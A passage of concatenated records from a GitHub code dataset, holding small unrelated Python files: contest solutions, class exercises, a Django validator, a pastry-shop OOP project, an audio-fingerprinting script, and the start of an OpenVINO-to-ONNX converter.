tooltip)\nmethods.open_webb_and_save(mapka, 'C:/Users/zs/Downloads/Sudety.html')\n","repo_name":"zszurman/caminozs","sub_path":"rsudety.py","file_name":"rsudety.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34631250206","text":"n = int(input())\r\nlst = list(map(int, input().split()))\r\nx = 2 ** n\r\nlst1 = lst[:x//2]\r\nlst2 = lst[x//2:]\r\n\r\n\r\ns1 = max(lst1)\r\ns2 = max(lst2)\r\n\r\nif s1 < s2:\r\n    print(lst1.index(s1) + 1)\r\nelse:\r\n    print(lst2.index(s2) + len(lst1) + 1)","repo_name":"YamasouA/Atcoder","sub_path":"abc188-c.py","file_name":"abc188-c.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28170626184","text":"cheese = [3, 2, 5, 6, 7, 3, 2]\ncrackers = [4, 5, 6, 7, 3, 5, 7]\nname = ['Max','Felix','Alex','Vivian','Ethan','Justine','Troy']\n\n# number 1\ndef histogram(l):\n    d = {}\n    for item in l:\n        d.setdefault(item, 0)\n        d[item] += 1\n\n    return d\n\nprint(histogram(cheese))\n\n# number 2\ndef dictmaker(keylist, valuelist): # same thing as last time\n    if len(keylist) != len(valuelist):\n        return\n\n    d = {}\n    for i in range(0, len(keylist)):\n        d[keylist[i]] = valuelist[i] \n\n    listmax = max(list(d.values()))\n\n    return d, list(d.keys())[list(d.values()).index(listmax)]\n\ncheesedict = dictmaker(name, cheese)[0]\ncrackerdict = dictmaker(name, crackers)[0]\nprint(cheesedict)\nprint(crackerdict)\n\n# number 3\ndef dictlookup(d, target):\n    return [key for key in d if d[key] == target]\n\nprint(dictlookup(cheesedict, 3))\nprint(dictlookup(crackerdict, 
7))\n","repo_name":"JustineTang10/python-class","sub_path":"4-18-2021.py","file_name":"4-18-2021.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3988136730","text":"from django.core.exceptions import ValidationError\n\n\ndef validate_phone(phone_str):\n phone_error = False\n if len(phone_str) == 10 or len(phone_str) == 11:\n c = [i for i in phone_str if i.isdecimal()]\n if c[0] == '8' and len(c) == 11:\n c = ['+', '7'] + c[1:]\n elif c[0] == '9' and len(c) == 10:\n c = ['+', '7'] + c\n elif c[0] == '7' and len(c) == 11:\n c = ['+', '7'] + c[1:]\n else:\n phone_error = True\n if phone_error:\n raise ValidationError('Проверьте номер телефона')\n else:\n # qwe = c[:2] + ['('] + c[2: 5] + [')'] + c[5: 8] + ['-'] + c[8:10] + ['-'] + c[10:]\n return ''.join(c)\n else:\n raise ValidationError('Проверьте длинну номера телефона')","repo_name":"MrFakir/zoobase","sub_path":"zoobase/app/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41306261842","text":"from project.booths.booth import Booth\nfrom project.booths.open_booth import OpenBooth\nfrom project.booths.private_booth import PrivateBooth\nfrom project.delicacies.delicacy import Delicacy\nfrom project.delicacies.gingerbread import Gingerbread\nfrom project.delicacies.stolen import Stolen\n\n\nclass ChristmasPastryShopApp:\n Valid_delicacies = {\n \"Gingerbread\": Gingerbread,\n \"Stolen\": Stolen,\n }\n\n Valid_booths = {\n \"Open Booth\": OpenBooth,\n \"Private Booth\": PrivateBooth, }\n\n def __init__(self):\n self.booths: list[Booth] = []\n self.delicacies: list[Delicacy] = []\n self.income = 0\n\n def add_delicacy(self, type_delicacy: str, name: str, price: float) -> str:\n # • If a delicacy with that name exists, raise an Exception with the following message:\n # \"{delicacy name} already exists!\"\n # • If the delicacy type is not valid, raise an Exception with the following message:\n # \"{type of delicacy} is not on our delicacy menu!\"\n # • Otherwise, create the delicacy, add it to the delicacies' list, and return the following message:\n # \"Added delicacy {delicacy name} - {type of delicacy} to the pastry shop.\"\n # • Valid types of delicacies are: \"Gingerbread\" and \"Stolen\"\n\n delicacy = [d for d in self.delicacies if d.name == name]\n\n if delicacy:\n raise Exception(f\"{name} already exists!\")\n\n if type_delicacy not in self.Valid_delicacies:\n raise Exception(f\"{type_delicacy} is not on our delicacy menu!\")\n\n delicacy = self.Valid_delicacies[type_delicacy](name, price) # creates an instance of the delicacy\n self.delicacies.append(delicacy)\n return f\"Added delicacy {name} - {type_delicacy} to the pastry shop.\"\n\n def add_booth(self, type_booth: str, booth_number: int, capacity: int) -> str:\n # The method creates a booth of the given type and adds it to the booths' collection.\n # All booth numbers should be unique.\n # • If a booth with that number exists, raise an Exception with the following message:\n # \"Booth number {booth number} already exists!\"\n # • If the booth type is not valid, raise an Exception with the following message:\n # \"{type of booth} is not a valid booth!\"\n # • Otherwise, create the booth, add it to the booths' list and return the following message:\n # \"Added booth number {booth number} in the pastry shop.\"\n # • Valid types of 
delicacies are: \"Open Booth\" and \"Private Booth\"\n\n booth = [b for b in self.booths if b.booth_number == booth_number]\n\n if booth:\n raise Exception(f\"Booth number {booth_number} already exists!\")\n\n if type_booth not in self.Valid_booths:\n raise Exception(f\"{type_booth} is not a valid booth!\")\n\n booth = self.Valid_booths[type_booth](booth_number, capacity) # creates an instance of the booth\n self.booths.append(booth)\n\n return f\"Added booth number {booth_number} in the pastry shop.\"\n\n def reserve_booth(self, number_of_people: int) -> str:\n # Finds the first booth that is not reserved and whose capacity is enough for the number of people\n # provided.\n # • If there is no such booth, raise an Exception with the following message:\n # \"No available booth for {number of people} people!\"\n # • Otherwise, reserves the booth and return:\n # \"Booth {booth number} has been reserved for {number of people} people.\"\n\n try:\n booth = next(filter(lambda b: b.capacity >= number_of_people and not b.is_reserved, self.booths))\n\n except StopIteration:\n raise Exception(f\"No available booth for {number_of_people} people!\")\n\n booth.reserve(number_of_people)\n\n return f\"Booth {booth.booth_number} has been reserved for {number_of_people} people.\"\n\n def order_delicacy(self, booth_number: int, delicacy_name: str) -> str:\n # Finds the booth with the provided number and the delicacy with the provided name;\n # and orders the delicacy for that booth.\n # • If there is no such booth, raise an Exception with the following message:\n # \"Could not find booth {booth number}!\"\n # • If there is no such delicacy, raise an Exception with the following message:\n # \"No {delicacy name} in the pastry shop!\"\n # • Otherwise, order the delicacy for that booth and return:\n # \"Booth {booth number} ordered {delicacy name}.\"\n\n try:\n booth = next(filter(lambda b: b.booth_number == booth_number, self.booths))\n\n except StopIteration:\n raise Exception(\"Could not find booth {booth number}!\")\n\n try:\n delicacy = next(filter(lambda d: d.name == delicacy_name, self.delicacies))\n\n except StopIteration:\n raise Exception(f\"No {delicacy_name} in the pastry shop!\")\n\n booth.delicacy_orders.append(delicacy)\n\n return f\"Booth {booth_number} ordered {delicacy_name}.\"\n\n def leave_booth(self, booth_number: int) -> str:\n # • Finds the booth with the same booth's number (the booth's number will always be valid).\n # • Calculates the bill for that booth taking the price for reservation and all the price of\n # all orders. 
The bill is added to the pastry shop's total income.\n # • Removes all the ordered delicacies, frees the booth, and sets the price for reservation to 0.\n # • Finally returns:\n # \"Booth {booth number}:\"\n # \"Bill: {bill - formatted to the second decimal}lv.\"\n\n booth = next(filter(lambda b: b.booth_number == booth_number, self.booths))\n\n bill = booth.price_for_reservation + sum(d.price for d in booth.delicacy_orders)\n\n booth.delicacy_orders.clear()\n booth.is_reserved = False\n booth.price_for_reservation = 0\n\n self.income += bill\n\n return f\"Booth {booth_number}:\\n\"\\\n f\"Bill: {bill:.2f}lv.\"\n\n def get_income(self) -> str:\n # • Returns the total income for the pastry shop for all completed bills in the format:\n # \"Income: {income - formatted to the second decimal place}lv.\"\n\n return f\"Income: {self.income:.2f}lv.\"\n\n","repo_name":"h-dmt/Python_Advanced","sub_path":"OOP_exam_prep/Exam-Preparation_1_OK/01.Christmas-Pastry-Shop-Structure-Skeleton/project/christmas_pastry_shop_app.py","file_name":"christmas_pastry_shop_app.py","file_ext":"py","file_size_in_byte":6330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34922523499","text":"# -*- coding: utf-8 -*-\nfrom setuptools import find_packages\nfrom setuptools import setup\n\nversion = '1.0b2.dev0'\ndescription = '.gov.br: Tradução de Português para Libras'\nlong_description = (\n open('README.rst').read() + '\\n' +\n open('CONTRIBUTORS.rst').read() + '\\n' +\n open('CHANGES.rst').read()\n)\n\nsetup(\n name='brasil.gov.vlibrasnews',\n version=version,\n description=description,\n long_description=long_description,\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Framework :: Plone',\n 'Framework :: Plone :: 4.3',\n 'Framework :: Plone :: 5.0',\n 'Framework :: Plone :: 5.1',\n 'Intended Audience :: System Administrators',\n 'License :: OSI Approved :: GNU General Public License v2 (GPLv2)',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n keywords='',\n author='Simples Consultoria',\n author_email='produtos@simplesconsultoria.com.br',\n url='https://github.com/plonegovbr/brasil.gov.vlibrasnews',\n packages=find_packages('src'),\n package_dir={'': 'src'},\n namespace_packages=['brasil', 'brasil.gov'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'plone.api',\n 'plone.app.layout',\n 'plone.app.registry',\n 'plone.autoform',\n 'plone.behavior',\n 'plone.dexterity',\n 'plone.memoize',\n 'plone.supermodel',\n 'Products.CMFPlone >=4.3',\n 'Products.GenericSetup',\n 'requests',\n 'setuptools',\n 'zope.component',\n 'zope.i18nmessageid',\n 'zope.interface',\n 'zope.schema',\n ],\n extras_require={\n 'test': [\n 'AccessControl',\n 'httmock',\n 'mock',\n 'plone.app.contenttypes',\n 'plone.app.robotframework',\n 'plone.app.testing [robot]',\n 'plone.app.textfield',\n 'plone.browserlayer',\n 'plone.registry',\n 'plone.testing',\n 'robotsuite',\n 'zope.component',\n ],\n },\n entry_points=\"\"\"\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n)\n","repo_name":"plonegovbr/brasil.gov.vlibrasnews","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8102612868","text":"# -*- coding: utf-8 -*-\nimport 
random\n\nclass Role(object):\n    def __init__(self, name, description, maximum=1):\n        self.name = name\n        self.description = description\n        self.maximum = maximum\n\n    def __str__(self):\n        return self.name\n\n\nclass Board(object):\n    # name = 'BoardGame'\n    # roles = []\n    def __init__(self, role_config={}):\n        self.role_config = role_config\n        self.role_index = {}\n        for role in self.roles:\n            self.role_index[role.name] = role\n\n    def set_role_config(self, role_config):\n        self.role_config = role_config\n\n    def get_description(self, role_name):\n        if role_name in self.role_index:\n            return self.role_index[role_name].description\n        else:\n            return ''\n\n    def get_maximum(self, role_name):\n        if role_name in self.role_index:\n            return self.role_index[role_name].maximum\n        else:\n            return 0\n\n    def deal(self):\n        res = []\n        for key, value in self.role_config.items():\n            if key in self.role_index:\n                role_name = key\n            else: \n                role_name = 'Unknown'\n            for i in range(value):\n                res.append(role_name)\n        random.seed()\n        random.shuffle(res)\n        return res\n\n    def __str__(self):\n        return self.name\n\n","repo_name":"knight19861986/SDM","sub_path":"GameAssistant/gameboards/boards.py","file_name":"boards.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18083720492","text":"import traceback\n\nfrom discord.ext import commands\n\nfrom main import AmongUs\nfrom utils import is_playing, NotPlaying, NoGamesExist\nfrom utils.utils import get_game, end_game\n\n\nclass EndGame(commands.Cog):\n    def __init__(self, bot):\n        self.bot: AmongUs = bot\n\n    @commands.command(name=\"endgame\", aliases=[\"end\"])\n    @is_playing()\n    async def end_game(self, ctx):\n        game = await get_game(self.bot.games, ctx)\n        await end_game(game)\n        self.bot.games.remove(game)\n        await ctx.send(f\"The game has ended in channel **{game.channel.name}**\")\n\n    @end_game.error\n    async def end_game_error(self, ctx, error):\n        if isinstance(error, (NotPlaying, NoGamesExist)):\n            return await ctx.send(error)\n\n        traceback.print_exc()\n    \n\ndef setup(bot):\n    bot.add_cog(EndGame(bot))\n","repo_name":"rowan-smith/AmongUsMute","sub_path":"cogs/end_game_cog.py","file_name":"end_game_cog.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6479240814","text":"from HOMOGENIZE.FracPlot import FracPlot\nfrom HOMOGENIZE import common\nimport os\nimport sys\n\ndef main():\n    os.system('cls')\n    \n    clargs = sys.argv\n    if len(clargs) < 2:\n        sys.exit('usage: blockPlot.py fileName')\n    fileName = clargs[1]\n    \n    P = FracPlot('blockModel', fileName=fileName, showPlots=False, colorBar=False)\n    P.setAxis_Zoom() \n    P.plotBlocks()\n    P.removeAxes()\n    P.lastFrame()\n    P.removeAxes()\n    P.saveFigure()\nif __name__ == '__main__':\n    main()\n","repo_name":"yetisir/up-frac","sub_path":"blockPlot.py","file_name":"blockPlot.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72176919913","text":"import heapq\r\n\r\ndef solve(start_node, li, N, road):\r\n    dist = [500001]*(N+1)\r\n    dist[start_node] = 0\r\n    pq = []\r\n    heapq.heappush(pq, [0, start_node])\r\n    while pq:\r\n        current_dist, current_node = heapq.heappop(pq)\r\n        for next_node, weight in li[current_node].items():\r\n            next_dist = dist[current_node] + weight\r\n            if next_dist < dist[next_node]:\r\n                dist[next_node] = next_dist\r\n                heapq.heappush(pq, [next_dist, next_node])\r\n    return 
dist\r\n\r\ndef solution(N, road, K):\r\n answer = 0\r\n li = [dict() for _ in range(N+1)]\r\n for i in range(len(road)):\r\n if road[i][1] in li[road[i][0]]:\r\n li[road[i][0]][road[i][1]] = min(li[road[i][0]][road[i][1]], road[i][2])\r\n else:\r\n li[road[i][0]][road[i][1]] = road[i][2]\r\n if road[i][0] in li[road[i][1]]:\r\n li[road[i][1]][road[i][0]] = min(li[road[i][1]][road[i][0]], road[i][2])\r\n else:\r\n li[road[i][1]][road[i][0]] = road[i][2]\r\n for v in solve(1, li, N, road):\r\n if v <= K:\r\n answer += 1\r\n return answer","repo_name":"khw5123/Algorithm","sub_path":"Programmers/배달.py","file_name":"배달.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22308212345","text":"import json\nimport os\nimport sys\nimport argparse\n\nproject_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.insert(0, project_path)\n\nfrom torch.utils.data import DataLoader, Dataset\nimport torch.nn as nn\nimport numpy as np\nimport librosa\nfrom tqdm import tqdm\nimport torch\n\nfrom utils.utils import crawl_directory, extract_mel_spectrogram\nfrom models.neural_fingerprinter import Neural_Fingerprinter\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config', required=True, help='The configuration json file.')\n \n return parser.parse_args()\n\nclass FileDataset(Dataset):\n\n def __init__(self, file, sr, hop_size):\n self.y, self.F = librosa.load(file, sr=sr)\n self.H = hop_size\n self.dur = self.y.size // self.F\n\n # Extract spectrograms\n self._get_spectrograms()\n\n def __len__(self):\n return len(self.spectrograms)\n\n def __getitem__(self, idx):\n return torch.from_numpy(self.spectrograms[idx])\n\n def _get_spectrograms(self):\n self.spectrograms = []\n J = int(np.floor((self.y.size - self.F) / self.H)) + 1\n for j in range(J):\n S = extract_mel_spectrogram(signal=self.y[j * self.H:j * self.H + self.F])\n self.spectrograms.append(S.reshape(1, *S.shape))\n\n\nif __name__ == '__main__':\n\n # parse args\n args = parse_args()\n config_file = args.config\n with open(config_file, \"r\") as f:\n args = json.load(f)\n print(f'Config:\\n{args}\\n')\n\n SR = args[\"SR\"]\n HOP_SIZE = args[\"HOP SIZE\"]\n input_dirs = [os.path.join(project_path, dir) for dir in args[\"input dirs\"]]\n output_dir = os.path.join(project_path, args[\"output dir\"])\n batch_size = args[\"batch size\"]\n pt_file = args[\"weights\"]\n attention = args['attention']\n\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n model = Neural_Fingerprinter(attention=attention).to(device)\n model.load_state_dict(torch.load(pt_file))\n print(f'Running on {device}')\n \n # Check if dir exists\n if not os.path.isdir(output_dir):\n raise FileNotFoundError(f\"dir {output_dir} does not exist, please create it and rerun\")\n\n all_songs = []\n for dir in input_dirs:\n all_songs += crawl_directory(dir, extension='wav')\n print(f'All songs: {len(all_songs)}')\n\n # Discard already fingerprinted songs\n to_discard = [os.path.basename(song).removesuffix('.npy') + '.wav' for song in crawl_directory(output_dir)]\n all_songs = [song for song in all_songs if os.path.basename(song) not in to_discard]\n print(f'Songs to fingerprint: {len(all_songs)} | Discarded: {len(to_discard)}')\n\n model.eval()\n fails = 0\n totals = len(all_songs)\n p_bar = tqdm(all_songs, desc='Extracting deep audio fingerprints', total=totals)\n with torch.no_grad():\n for file in p_bar:\n file_dset = 
FileDataset(file=file, sr=SR, hop_size=HOP_SIZE)\n if file_dset.dur < 1:\n print(f'Song: {os.path.basename(file)} has duration less than 1 sec. Skipping...')\n fails += 1\n continue\n file_dloader = DataLoader(file_dset, batch_size=batch_size, shuffle=False)\n fingerprints = []\n\n for X in file_dloader:\n X = model(X.to(device))\n fingerprints.append(X.cpu().numpy())\n try:\n fingerprints = np.vstack(fingerprints)\n np.save(\n file=os.path.join(output_dir,\n os.path.basename(file).removesuffix('.wav') + '.npy'),\n arr=fingerprints\n )\n except Exception as e:\n print(f'Failed to save {os.path.basename(file)} | Error: {e}')\n fails += 1\n continue\n\n print(f'Totals: {totals}\\nFails: {fails}')\n","repo_name":"ChrisNick92/deep-audio-fingerprinting","sub_path":"generation/generate_fingerprints.py","file_name":"generate_fingerprints.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"15242876059","text":"#!/usr/bin/env python\n\nFILE_NAME_BASE = 'B-large'\nNUM_PROCESSES = 4\nMEM_LIMIT_GB = 1.5 # per worker process\nRECURSION_LIMIT = 1000\n\nfrom collections import defaultdict\nfrom itertools import product\n\ndef parse(inp):\n\tnumKeys, targetLen, typeLen = (int(x) for x in inp.readline().split())\n\tkeys = inp.readline().strip()\n\tassert len(keys) == numKeys\n\ttarget = inp.readline().strip()\n\tassert len(target) == targetLen\n\treturn keys, target, typeLen\n\ndef maxPrefix(s):\n\treturn reduce(max, (i for i in xrange(1, len(s)) if s[:i] == s[-i:]), 0)\n\ndef solve(keys, target, typeLen):\n\tif set(target) - set(keys):\n\t\treturn 0.0\n\n\tassert len(target) <= typeLen\n\tmp = maxPrefix(target)\n\tmaxBananas = 1 + (typeLen - len(target)) / (len(target) - mp)\n\n\tif False:\n\t\tmatches = 0\n\t\tfor typed in product(keys, repeat=typeLen):\n\t\t\tword = ''.join(typed)\n\t\t\ti = 0\n\t\t\twhile True:\n\t\t\t\ti = word.find(target, i)\n\t\t\t\tif i == -1:\n\t\t\t\t\tbreak\n\t\t\t\tmatches += 1\n\t\t\t\ti += 1\n\t\tslowMatches = matches\n\n\tkeyHist = defaultdict(int)\n\tfor key in keys:\n\t\tkeyHist[key] += 1\n\ttrans = []\n\tfor i in xrange(len(target)):\n\t\tnxt = []\n\t\tpref = maxPrefix(target[:i])\n\t\tfor key, chance in keyHist.iteritems():\n\t\t\tfull = False\n\t\t\tif key == target[i]:\n\t\t\t\tsucc = i + 1\n\t\t\t\tif succ == len(target):\n\t\t\t\t\tfull = True\n\t\t\t\t\tsucc = mp\n\t\t\telif key == target[pref]:\n\t\t\t\tsucc = pref + 1\n\t\t\telse:\n\t\t\t\tsucc = 0\n\t\t\tnxt.append([succ, full, chance])\n\t\ttrans.append(nxt)\n\tprogress = [[1] + [0] * (len(target) - 1)]\n\tfor rep in xrange(typeLen):\n\t\tnewProgress = [[0] * len(target)]\n\t\tfor j, pj in enumerate(progress):\n\t\t\tfor i, p in enumerate(pj):\n\t\t\t\tfor succ, full, chance in trans[i]:\n\t\t\t\t\tif j + full >= len(newProgress):\n\t\t\t\t\t\tnewProgress.append([0] * len(target))\n\t\t\t\t\tnewProgress[j + full][succ] += p * chance\n\t\tprogress = newProgress\n\tmatches = 0\n\tfor j, pj in enumerate(progress):\n\t\tmatches += j * sum(pj)\n\t#assert matches == slowMatches, (matches, slowMatches)\n\n\twords = len(keys) ** typeLen\n\treturn maxBananas - float(matches) / float(words)\n\ndef main():\n\timport sys\n\tsys.setrecursionlimit(RECURSION_LIMIT)\n\n\timport resource\n\tsoft, hard = resource.getrlimit(resource.RLIMIT_AS)\n\tresource.setrlimit(resource.RLIMIT_AS, (MEM_LIMIT_GB * 1024 ** 3, hard))\n\n\twith open(FILE_NAME_BASE + '.in', 'r') as inp:\n\t\tnumCases = int(inp.readline())\n\t\tinputs = 
[parse(inp) for _ in xrange(numCases)]\n\n\tif NUM_PROCESSES == 0:\n\t\trunners = [lambda inp=inp: apply(solve, inp) for inp in inputs]\n\telse:\n\t\tfrom multiprocessing import Pool\n\t\tfrom signal import SIGINT, SIG_IGN, signal\n\t\tpool = Pool(NUM_PROCESSES, signal, (SIGINT, SIG_IGN))\n\t\trunners = [pool.apply_async(solve, inp).get for inp in inputs]\n\t\tpool.close()\n\n\tcaseFmt = '%' + str(len(str(numCases))) + 'd'\n\tprogressFmt = '[%s/%s] %%s\\n' % (caseFmt, caseFmt)\n\twith open(FILE_NAME_BASE + '.out', 'w') as out:\n\t\tfor case, runner in enumerate(runners, 1):\n\t\t\tresult = runner()\n\t\t\tout.write('Case #%d: %s\\n' % (case, result))\n\t\t\tout.flush()\n\t\t\tsys.stderr.write(progressFmt % (case, numCases, result))\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/CodeJamData/15/32/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"10924285494","text":"import pytest\nfrom game import Game\nfrom board import Board\n\n@pytest.fixture\ndef game():\n return Game()\n\ndef test_game_is_draw(game):\n # Test an empty board (not a draw)\n game.board = Board()\n assert game.is_draw() == False\n\n # Test a board with a win (not a draw)\n game.board.grid = [\n ['X', 'O', 'X'],\n ['X', 'O', 'O'],\n ['O', 'O', 'X'] # Change this line to have a win\n ]\n assert game.is_draw() == False\n\n # Test a full board with no win (a draw)\n game.board.grid = [\n ['X', 'O', 'X'],\n ['O', 'O', 'X'],\n ['X', 'X', 'O']\n ]\n assert game.is_draw() == True\n","repo_name":"PFound/GPT4_TicTacToe","sub_path":"test/test_game.py","file_name":"test_game.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10404408205","text":"\r\nclass PositionCalculator:\r\n\r\n\tdef __init__(self):\r\n\t\tself.__width = 0\r\n\t\tself.__height = 0\r\n\t\tself.__margin = 0\r\n\t\tself.__padding = 0\r\n\t\tself.__chessmanSpacing = 0\r\n\t\tself.__boundarySpacing = 0\r\n\r\n\tdef outlinePos(self):\r\n\t\toutlineSize = self.outlineSize()\r\n\t\textraWidth = self.__width - outlineSize[0]\r\n\t\textraHeight = self.__height - outlineSize[1]\r\n\t\treturn (extraWidth // 2 , extraHeight // 2)\r\n\r\n\tdef borderPos(self):\r\n\t\tretX, retY = self.outlinePos()\r\n\t\tretX += self.__padding\r\n\t\tretY += self.__padding\r\n\t\treturn (retX, retY)\r\n\r\n\tdef positionAtScreen(self, x, y):\r\n\t\tretX, retY = self.borderPos()\r\n\t\tcellSize = self.chessmanSize() + self.__chessmanSpacing\r\n\t\tretX += cellSize * x\r\n\t\tretY += cellSize * y\r\n\t\tif y > 4:\r\n\t\t\tretY += self.__boundarySpacing\r\n\t\treturn (retX, retY)\r\n\r\n\tdef positionAtBoard(self, x, y):\r\n\t\toriginX, originY = self.borderPos()\r\n\t\tx -= originX\r\n\t\ty -= originY\r\n\t\tchessmanSize = self.chessmanSize()\r\n\t\tradius = chessmanSize//2\r\n\t\tcellSize = chessmanSize + self.__chessmanSpacing\r\n\t\tx += radius\r\n\t\ty += radius\r\n\t\tif x < 0 or y < 0:\r\n\t\t\treturn\r\n\t\tif y > 5*cellSize+self.__boundarySpacing:\r\n\t\t\ty -= self.__boundarySpacing\r\n\t\telif y >= 5*cellSize:\r\n\t\t\treturn\r\n\t\tretX = x//cellSize\r\n\t\tretY = y//cellSize\r\n\t\tif x-retX*cellSize > chessmanSize or y-retY*cellSize > chessmanSize:\r\n\t\t\treturn\r\n\t\tif retX>8 or retY>9:\r\n\t\t\treturn\r\n\t\treturn (retX, retY)\r\n\r\n\tdef chessmanSize(self):\r\n\t\tmaxWidth = 
self.__width\r\n\t\tmaxWidth -= 2*self.__margin\r\n\t\tmaxWidth -= 2*self.__padding\r\n\t\tmaxWidth -= 8*self.__chessmanSpacing\r\n\t\tmaxWidth //= 8\r\n\t\tmaxHeight = self.__height\r\n\t\tmaxHeight -= 2*self.__margin\r\n\t\tmaxHeight -= 2*self.__padding\r\n\t\tmaxHeight -= 9*self.__chessmanSpacing\r\n\t\tmaxHeight -= self.__boundarySpacing\r\n\t\tmaxHeight //= 9\r\n\t\treturn min(maxWidth, maxHeight)\r\n\r\n\tdef outlineSize(self):\r\n\t\treturn self.__outlineSize(self.chessmanSize())\r\n\r\n\tdef borderSize(self):\r\n\t\treturn self.__borderSize(self.chessmanSize())\r\n\r\n\tdef boardSize(self):\r\n\t\treturn (self.__width, self.__height)\r\n\r\n\tdef __borderSize(self, chessmanSize):\r\n\t\tretWidth, retHeight = (8*chessmanSize, 9*chessmanSize)\r\n\t\tretWidth += 8*self.__chessmanSpacing\r\n\t\tretHeight += 9*self.__chessmanSpacing\r\n\t\tretHeight += self.__boundarySpacing\r\n\t\treturn (retWidth, retHeight)\r\n\r\n\tdef __outlineSize(self, chessmanSize):\r\n\t\tretWidth, retHeight = self.__borderSize(chessmanSize)\r\n\t\tretWidth += 2*self.__padding\r\n\t\tretHeight += 2*self.__padding\r\n\t\treturn (retWidth, retHeight)\r\n\r\n\tdef boardSizeForFixedChessmanSize(self, chessmanSize):\r\n\t\tretWidth, retHeight = self.__outlineSize(chessmanSize)\r\n\t\tretWidth += 2*self.__margin\r\n\t\tretHeight += 2*self.__margin\r\n\t\treturn (retWidth, retHeight)\r\n\r\n\tdef setMargin(self, margin):\r\n\t\tself.__margin = margin\r\n\r\n\tdef setPadding(self, padding):\r\n\t\tself.__padding = padding\r\n\r\n\tdef setChessboardSize(self, width, height):\r\n\t\tself.__width = width\r\n\t\tself.__height = height\r\n\r\n\tdef setChessmanSpacing(self, spacing):\r\n\t\tself.__chessmanSpacing = spacing\r\n\r\n\t# Width of the Chu River-Han border gap (the blank band across the middle of the board)\r\n\tdef setBoundarySpacing(self, boundarySpacing):\r\n\t\tself.__boundarySpacing = boundarySpacing\r\n\r\n\r\n","repo_name":"xiyanggudao/AIChineseChess","sub_path":"gui/PositionCalculator.py","file_name":"PositionCalculator.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29380789848","text":"import argparse\nimport json\nimport numpy as np\nimport glob\nimport os\nimport onnx\nimport onnx.utils\nfrom . 
import onnx_helper \nfrom onnx import checker, helper\nfrom .onnx_helper import onnx_save_model\nfrom .openvino_parse_xml import parse_openvino_xml\nfrom .onnx_infer import onnx_infer, onnx_activations_batched, onnx_random_infer, onnx_random_input, load_image\nfrom .utils import *\nimport sys\n\n\nnp.set_printoptions(suppress=True, precision=4, linewidth=120)\n\n\ndef trunc(arr, decimals=8):\n return np.trunc(arr*10**decimals)/(10**decimals)\n\n\ndef gather_stats(onnx_model, nodes, folder, count, scale):\n images = []\n extensions = ['*.jpg', '*.png', '*.jpeg']\n extensions += [e.upper() for e in extensions]\n for ext in extensions:\n images += sorted(glob.glob(os.path.join(folder, ext)))\n if count:\n images = images[:count]\n input_shape = onnx_helper.get_model_input_shape(onnx_model)\n\n channels = input_shape[0]\n height = input_shape[1]\n width = input_shape[2]\n input_arrays = np.vstack([load_image(i, scale, channels, height, width) for i in images])\n stats = onnx_activations_batched(onnx_model, input_arrays, stats_only=True)\n\n stats_list = []\n for output in sorted(stats.keys()):\n stats_list.append({'id':output,\n 'mean': stats[output]['mean'],\n 'max': stats[output]['max'],\n 'min': stats[output]['min']})\n\n if not (nodes is None):\n for node in nodes:\n node.set_stats_by_id(stats_list)\n return nodes\n else:\n return stats_list\n\n\ndef as_int(x):\n values = [int(_) for _ in x.split(',')]\n\n if len(values) == 1:\n return values[0]\n else:\n return values\n\n\ndef io(vinode):\n inputs = ['{}'.format(_) for _ in vinode._from]\n if vinode.weights:\n inputs += ['W{}'.format(vinode.id)]\n if vinode.biases:\n inputs += ['b{}'.format(vinode.id)]\n outputs = ['{}'.format(vinode.id)]\n\n return inputs, outputs\n\n\ndef gen_pad_10(vinode, vinodes):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n pads_begin = vinodes[int(inputs[1])]\n pads_end = vinodes[int(inputs[2])]\n inputs = inputs[:1]\n\n pads = pads_begin.data['arr'].tolist() + pads_end.data['arr'].tolist()\n if pads[0] != 0:\n 